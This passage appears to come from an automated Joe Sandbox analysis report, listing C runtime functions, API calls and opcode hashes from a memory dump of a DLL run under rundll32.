            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 1170836740-1018135373
            • Opcode ID: 69fd1bfa55e94afeef1c325459d507bc03279ce2f1966147d18af7cecfc4d3fe
            • Instruction ID: 705981f842d9c66f07f751a053eb0d374373624731510c8bbba18037f844469a
            • Opcode Fuzzy Hash: 69fd1bfa55e94afeef1c325459d507bc03279ce2f1966147d18af7cecfc4d3fe
            • Instruction Fuzzy Hash: 2541AF35A00209DFCF00DFA8C890EDEBBB9BF45328F108495E8246B395E731AA15DBD1
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: api-ms-$ext-ms-
            • API String ID: 0-537541572
            • Opcode ID: 0e07519c7c299091978b6ca8f9b34c15a2de5df30a5e5f51835d51ca7b842118
            • Instruction ID: a6ca8ff5f9863a3d51e4875ff973800f3c591249a26f37deb551665eb747e751
            • Opcode Fuzzy Hash: 0e07519c7c299091978b6ca8f9b34c15a2de5df30a5e5f51835d51ca7b842118
            • Instruction Fuzzy Hash: 8A21E432B55621EBFB518AEA8C40F4B3778AB427A0F110120E921FF2A4F730ED14C6E4
            APIs
              • Part of subcall function 6EC4E397: _free.LIBCMT ref: 6EC4E3BC
            • _free.LIBCMT ref: 6EC4E41D
              • Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
              • Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937
            • _free.LIBCMT ref: 6EC4E428
            • _free.LIBCMT ref: 6EC4E433
            • _free.LIBCMT ref: 6EC4E487
            • _free.LIBCMT ref: 6EC4E492
            • _free.LIBCMT ref: 6EC4E49D
            • _free.LIBCMT ref: 6EC4E4A8
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
            • Instruction ID: 0ef47ef9562b14d66d88481f0294a889c697451d29212ee0a426dab9fdc059bd
            • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
            • Instruction Fuzzy Hash: A211FE71544B08EED621EFF0CC45FCB7FACAF04704F414C19A699AA294FB76FA148654
            APIs
            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6EC4F2A4
            • __fassign.LIBCMT ref: 6EC4F489
            • __fassign.LIBCMT ref: 6EC4F4A6
            • WriteFile.KERNEL32(?,6EC4D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EC4F4EE
            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EC4F52E
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EC4F5D6
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
            • String ID:
            • API String ID: 1735259414-0
            • Opcode ID: bc465621cbf4c83f30835265549ab715d448638bede61aef95737c9de94e7299
            • Instruction ID: adf3d8665abe7dc3c731287503e53a81edcaec39460c04f3a7b8ffe36868e8af
            • Opcode Fuzzy Hash: bc465621cbf4c83f30835265549ab715d448638bede61aef95737c9de94e7299
            • Instruction Fuzzy Hash: 1DC19C75D00299DFCB14CFE8C9909EDBBB9BF49314F28916AE865B7241E7319902CF60
            APIs
            • GetLastError.KERNEL32(00000001,?,6EC47B9E,6EC468B4,6EC46D4B,?,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8,0000000C,6EC4707E), ref: 6EC47F97
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EC47FA5
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EC47FBE
            • SetLastError.KERNEL32(00000000,6EC46F85,?,00000001,?,?,00000001,?,6EC5C7F8,0000000C,6EC4707E,?,00000001,?), ref: 6EC48010
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: ae1d9683c46111597d8c0d9ce9fc28cb2bcf5572c8f41b5ebe9abc4a210d8f6a
            • Instruction ID: 49a9b075ced9239b994a7f514abe36ee373b17dbb989ccea85e9ce02e6f5b2c7
            • Opcode Fuzzy Hash: ae1d9683c46111597d8c0d9ce9fc28cb2bcf5572c8f41b5ebe9abc4a210d8f6a
            • Instruction Fuzzy Hash: F601D47312CB22EEAB651AF56D88A972778EB837793200B29F530A91D8FF1148117180
            Strings
            • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EC4C180
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: C:\Windows\SysWOW64\rundll32.exe
            • API String ID: 0-2837366778
            • Opcode ID: 4e00ef2a050066b7233e9a4c1de57b1987209e5ea60fb26d9a4ef271a2c38fe6
            • Instruction ID: 60240f0daf157d5c6448768d72b4d7ecf6fd7f67277be6421ed3e75fb06670f4
            • Opcode Fuzzy Hash: 4e00ef2a050066b7233e9a4c1de57b1987209e5ea60fb26d9a4ef271a2c38fe6
            • Instruction Fuzzy Hash: E6219FB1614609EFBB649EF68C80DAB77BDAF813687104915F924DB178FB70DC1887A0
            APIs
            • FreeLibrary.KERNEL32(00000000,?,?,6EC490B8,00000000,?,00000001,00000000,?,6EC4912F,00000001,FlsFree,6EC56E3C,FlsFree,00000000), ref: 6EC49087
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID: api-ms-
            • API String ID: 3664257935-2084034818
            • Opcode ID: 396575759259e1932c2b9cf5d3add8bfd89cfdb021078907e9b89e0431b1fbfa
            • Instruction ID: 871ae82327b0254e1242b16372e8d72f155a327d3934c6b3336a182ded2030ec
            • Opcode Fuzzy Hash: 396575759259e1932c2b9cf5d3add8bfd89cfdb021078907e9b89e0431b1fbfa
            • Instruction Fuzzy Hash: 8911A732A55A32EBDB538BA98A4474937B4AF46770F110250E931F7288F770ED1086E5
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EC4A28B,?,?,6EC4A253,?,00000001,?), ref: 6EC4A2EE
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EC4A301
            • FreeLibrary.KERNEL32(00000000,?,?,6EC4A28B,?,?,6EC4A253,?,00000001,?), ref: 6EC4A324
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: e9b52ccc20d894dd324dcd4e5d309f1852942073f240fdf24289d7a53c8899aa
            • Instruction ID: ebb83ae294809002cc9035ed001564a490f978706a1ce8c9f2156ed406eae4b5
            • Opcode Fuzzy Hash: e9b52ccc20d894dd324dcd4e5d309f1852942073f240fdf24289d7a53c8899aa
            • Instruction Fuzzy Hash: 24F01C31921A19FBDF019BA1C919B9E7B79EB81756F104164F412B2250FB31CA20DB99
            APIs
            • _free.LIBCMT ref: 6EC4E346
              • Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
              • Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937
            • _free.LIBCMT ref: 6EC4E358
            • _free.LIBCMT ref: 6EC4E36A
            • _free.LIBCMT ref: 6EC4E37C
            • _free.LIBCMT ref: 6EC4E38E
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 9dd02f824a5cffdaddcf58e20eeac693f46146959f1cd0ee1702d5aa63c36ab5
            • Instruction ID: 3d005b60987006e300f838c5fbcfe343803ef3eee5a821ccdc03faf3f8230b20
            • Opcode Fuzzy Hash: 9dd02f824a5cffdaddcf58e20eeac693f46146959f1cd0ee1702d5aa63c36ab5
            • Instruction Fuzzy Hash: 8BF06D31400609DFCA55DFE8E1C0D5F33FDAA00760361AC09F018EB648EB31FC908AA0
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free
            • String ID: *?
            • API String ID: 269201875-2564092906
            • Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
            • Instruction ID: 30f7019b06830707efa3f28094681d2a17807ff8b489ce1c3463352924e96d94
            • Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
            • Instruction Fuzzy Hash: 26611975E04219DFDB15CFA9C8809EDFBF9EF48314B25856AD815E7308E731AE418B90
            APIs
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: aacc1f966d30d9916ee7eceb16dd44610ffa4903a52712385ab4072e62ad93f7
            • Instruction ID: b92ade735a49dfb697bf92a3f180e9d0f9e7bebb43625d79d5feb069ccc834ba
            • Opcode Fuzzy Hash: aacc1f966d30d9916ee7eceb16dd44610ffa4903a52712385ab4072e62ad93f7
            • Instruction Fuzzy Hash: BD519BB3A05646EFEB158F95D890FAA77A8EF00314F10492AFD1257294F731E890C7D0
            APIs
              • Part of subcall function 6EC4C035: _free.LIBCMT ref: 6EC4C043
              • Part of subcall function 6EC4CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6EC4D927,6EC4FBE4,0000FDE9,00000000,?,?,?,6EC4F95D,0000FDE9,00000000,?), ref: 6EC4CCB5
            • GetLastError.KERNEL32 ref: 6EC4BA7B
            • __dosmaperr.LIBCMT ref: 6EC4BA82
            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6EC4BAC1
            • __dosmaperr.LIBCMT ref: 6EC4BAC8
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
            • String ID:
            • API String ID: 167067550-0
            • Opcode ID: 62c788800297299d2d31131cb5d49e51377abf96ca6be94c31ed67c3432f4f77
            • Instruction ID: 2cbe17dc171ee14f7dcf10926fe92de6a7162af58e0477722cb87689726042ad
            • Opcode Fuzzy Hash: 62c788800297299d2d31131cb5d49e51377abf96ca6be94c31ed67c3432f4f77
            • Instruction Fuzzy Hash: 5A218071604609EFAB109FE68984D9FB7FDFF453687108919F96897258FB31EC2087A0
            APIs
            • GetLastError.KERNEL32(?,?,?,6EC4F6A4,?,00000001,6EC4D998,?,6EC4FB5E,00000001,?,?,?,6EC4D927,?,00000000), ref: 6EC4B2D1
            • _free.LIBCMT ref: 6EC4B32E
            • _free.LIBCMT ref: 6EC4B364
            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6EC4FB5E,00000001,?,?,?,6EC4D927,?,00000000,00000000,6EC5CB78,0000002C,6EC4D998), ref: 6EC4B36F
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ErrorLast_free
            • String ID:
            • API String ID: 2283115069-0
            • Opcode ID: 40532d64351cde5711df1605392b7501f88677e49cd71b9c13e4b380a99666a7
            • Instruction ID: 511d9c3c33f0e436d6bab508a7bf302d96cfc3e4f2ca1b8ea3a886ea7282cd2d
            • Opcode Fuzzy Hash: 40532d64351cde5711df1605392b7501f88677e49cd71b9c13e4b380a99666a7
            • Instruction Fuzzy Hash: 6111E972604B02EFDB612AFA4D80B5F267DABC2778B240E24F134A72CCFF6188115611
            APIs
            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001), ref: 6EC5067D
            • GetLastError.KERNEL32(?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?,00000001,?,6EC4FB7F,6EC4D927), ref: 6EC50689
              • Part of subcall function 6EC5064F: CloseHandle.KERNEL32(FFFFFFFE,6EC50699,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?,00000001), ref: 6EC5065F
            • ___initconout.LIBCMT ref: 6EC50699
              • Part of subcall function 6EC50611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EC50640,6EC500B7,00000001,?,6EC4F633,?,?,00000001,?), ref: 6EC50624
            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EC500CA,?,00000001,?,00000001,?,6EC4F633,?,?,00000001,?), ref: 6EC506AE
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
            • String ID:
            • API String ID: 2744216297-0
            • Opcode ID: 10f1a9c9dc91123816715c89232a3b7b668dc4bdcab73924e6258bf4b1fde1b0
            • Instruction ID: 625e79b35d5e9fe83e404382920c05e8e31279f72f67ac24a9835d5aac8f3587
            • Opcode Fuzzy Hash: 10f1a9c9dc91123816715c89232a3b7b668dc4bdcab73924e6258bf4b1fde1b0
            • Instruction Fuzzy Hash: E2F0C736510A15BBCF525FD5CD0598E3F75FB85365B044511FE19D5220EB318830EB95
            APIs
            • _free.LIBCMT ref: 6EC4AC58
              • Part of subcall function 6EC4B90F: HeapFree.KERNEL32(00000000,00000000,?,6EC4AB0E), ref: 6EC4B925
              • Part of subcall function 6EC4B90F: GetLastError.KERNEL32(?,?,6EC4AB0E), ref: 6EC4B937
            • _free.LIBCMT ref: 6EC4AC6B
            • _free.LIBCMT ref: 6EC4AC7C
            • _free.LIBCMT ref: 6EC4AC8D
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 92f2a4057c892b4274675eebc6487f9ed4b5deadcf4be5664af5c1f632d9ff7f
            • Instruction ID: 091889ed02c57fe062f06f92788da8c62d5fec472f6afa31a50e972e1a8b72b3
            • Opcode Fuzzy Hash: 92f2a4057c892b4274675eebc6487f9ed4b5deadcf4be5664af5c1f632d9ff7f
            • Instruction Fuzzy Hash: 1EE04671810DA9EE8E4A2F508B004CA3B39EB57A243298416E80872218D7320A72DF8A
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: C:\Windows\SysWOW64\rundll32.exe
            • API String ID: 0-2837366778
            • Opcode ID: 74f926bafbd6e57f889939d66d0a6d3c19f7971dc5a9f5e9d8553d4ac2d32b6a
            • Instruction ID: 1ca1fed6efb5b1ac6855177fe3ec2f2c646a4c8467c6ff1b452b9ae611082cba
            • Opcode Fuzzy Hash: 74f926bafbd6e57f889939d66d0a6d3c19f7971dc5a9f5e9d8553d4ac2d32b6a
            • Instruction Fuzzy Hash: F9419C70A00659EFDB168FE98D849DEBBBCEBC5310F20547AE814A7250F7708A50CB95
            APIs
            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EC4868F
            Strings
            Memory Dump Source
            • Source File: 00000007.00000002.3176466717.000000006EC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 6EC40000, based on PE: true
            • Associated: 00000007.00000002.3176449772.000000006EC40000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176490883.000000006EC56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176508871.000000006EC5E000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000007.00000002.3176531454.000000006EC60000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_7_2_6ec40000_rundll32.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID: MOC$RCC
            • API String ID: 2118026453-2084237596
            • Opcode ID: e08002c4bf493a526f9b1124e693bfe04b74bfd5b5db5eb33503c5f3dacab1e0
            • Instruction ID: 9a1110f8b6b9b6c4b96aff06e74c97ab4607c49968ece2a8d4130c536db907fc
            • Opcode Fuzzy Hash: e08002c4bf493a526f9b1124e693bfe04b74bfd5b5db5eb33503c5f3dacab1e0
            • Instruction Fuzzy Hash: F5415672900209EFDF41CFD4CC91EEEBBB5BF48304F148459FA14A6254E3359A50DBA0